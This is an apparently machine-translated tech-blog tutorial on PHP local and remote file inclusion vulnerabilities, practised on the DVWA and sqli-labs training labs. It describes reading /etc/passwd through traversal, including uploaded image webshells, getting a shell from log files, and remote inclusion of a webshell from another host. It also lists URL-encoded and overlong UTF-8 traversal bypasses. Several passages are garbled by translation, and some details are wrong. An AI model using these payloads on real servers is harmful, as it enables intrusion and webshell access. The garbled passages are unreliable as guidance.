Shulou(Shulou.com)06/01 Report--

This experiment is based on DVWA and sqli-labs

Experiment platform building: download Wamp integration environment, and download DVWA and sqli-labs and compressed package decompression to wamp\www directory. Installation as long as attention to Wamp environment database name and password can be corresponding.

0x01: File contains vulnerability

When the server contains arbitrary files through php features (functions), because the source of the file to be included is not strictly filtered, it can contain a malicious file, and we can construct this malicious file to achieve evil purposes.

This is also an official explanation. In personal terms, through the browser, url address or the content of a parameter variable, you can read other files before the web root directory by modifying the content of these url or parameter variables. However, unlike directory browsing, directory browsing can directly display the name of each file under the www directory through the browser and list the directory.

File contains cause of vulnerability

Program developers typically write reusable functions into a single file, calling the file directly when they need to use a function without having to write it again, and the process of file invocation is generally called file inclusion. Program developers generally want code to be flexible, so they set included files as variables for dynamic invocation,

But it is precisely because of this flexibility that clients can invoke a malicious file, causing the file to contain vulnerabilities. Almost all scripting languages will provide the functions contained in the file, but the file contains vulnerabilities in PHP Web Applications, while in JSP, ASP, ASP.NET programs are very few, or even no, this is some of the disadvantages of language design. Inclusion vulnerabilities are common in PHP, but that doesn't mean other languages don't exist.

Common files contain functions

include(): include files only when executed to include, only generate warnings when included files are not found, script will continue to execute

require(): As long as the program contains files as soon as it runs, fatal errors will be generated if no included files are found and the script will be stopped.

include_once() and require_once(): These two functions do almost the same thing as the first two functions, except that if the code in the file is already included, it will not be included again

LFI (Locally Contained Vulnerability) directory traversal can be understood as locally-contained vulnerability, verification and exploitation methods are the same.

RFI (Remote Inclusion Vulnerability) can include URL addresses of other hosts, such as opening a www service yourself and then putting a *** file on it if it is code that will execute on this machine. To get access to the shell depends on the account running the www service.

Features containing vulnerabilities: (This can be said to be the dry goods in the text)

In a page, the value of a variable is equal to a page file or a fixed value, such as

？page=a.asp

？home=b.html

？file=content

vulnerability classification

Local file inclusion: can include local files, and even execute code when conditions permit

Upload pictures of horses and then include

Read sensitive files, read PHP files

GetShell contains log files

GetShell contains/proc/self/envion file

pseudo-protocol containing data: or php://input

If phpinfo is available, temporary files can be included.

Remote file contains: can execute arbitrary code directly

Make sure that allow_url_fopen and allow_url_include in php.ini are On

0x02, File contains exploit

1. Contains other files on the read target machine

If there is no filtering for the retrieved parameter page, then we can arbitrarily specify other sensitive files on the target host

In Linux,". "indicates the current directory,".. "indicates the next level of directory when../ Go to the root directory, and then the parent directory is still the root directory.

With the usual ".../ "Contains log files.

2. Contains PHP*** that works

In many places, we can upload pictures, such as uploading avatars, pictures, etc., here upload pictures first, the content of the pictures is a sentence ***

Due to upload restrictions, generally can only upload jpg, png image format, the code can not be executed, we use the local way to include the image, the code will be executed, the code does not need to suffix name is php, asp format, as long as the content is code can be executed.

Then use Chinese kitchen knife to connect (no matter how high your kung fu is, you are afraid of kitchen knife!)

3. Remote include url and php***

If the target host's "allow_url_fopen" is active (default is active), we have more room to use, we can specify a webshell containing PHP code on another URL to run directly

Do not need the suffix name is php, asp format, as long as the content is code can be.

Less likely to occur than locally contained, but easier to exploit

such as write a sentence of code on your own server, and then use a remote containment vulnerability to contain that link,

http://127.0.0.1/dvwa/vulnerabilities/fi/? page=http://192.168.0.117/a.php

Then the same as above, with a kitchen knife connection, get webshell.

0x03, contains vulnerability bypass techniques

In exploiting the vulnerability, we often encounter a problem. When checking page=/etc/passwd, an error occurs. The/etc/passwd.php file cannot be found. This indicates that the suffix.php is automatically added by default. There are several ways to bypass it.

1. Coding bypasses character filtering

(1) by adding "... "When you add a dot, you ignore what's behind it.

(2)"", that is, null empty character (/etc/passwd), in the php language format, when encountered, regardless of whether there is anything else behind, do not look, only look at the front content

(3)"#" to bypass file extension filtering

2. Coding

URL encoding, double layer (multilayer) URL encoding

%2e%2e%2f Decoding: ../

%2e%2e%5c Decode: ..\

%25%2e%25%2e%255c Decode: ..\ (Burp multi-layer coding and decoding can be used)

unicode/UTF-8 encoding

..% c0%af Decoding: ../

%c1%9c Decode: ..\

But whether the encoding can work correctly depends on whether the web server can parse the encoded code.

3. Other systems may be special characters used to

file.txt ...

file.txt

file .txt """"""""

file.txt

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.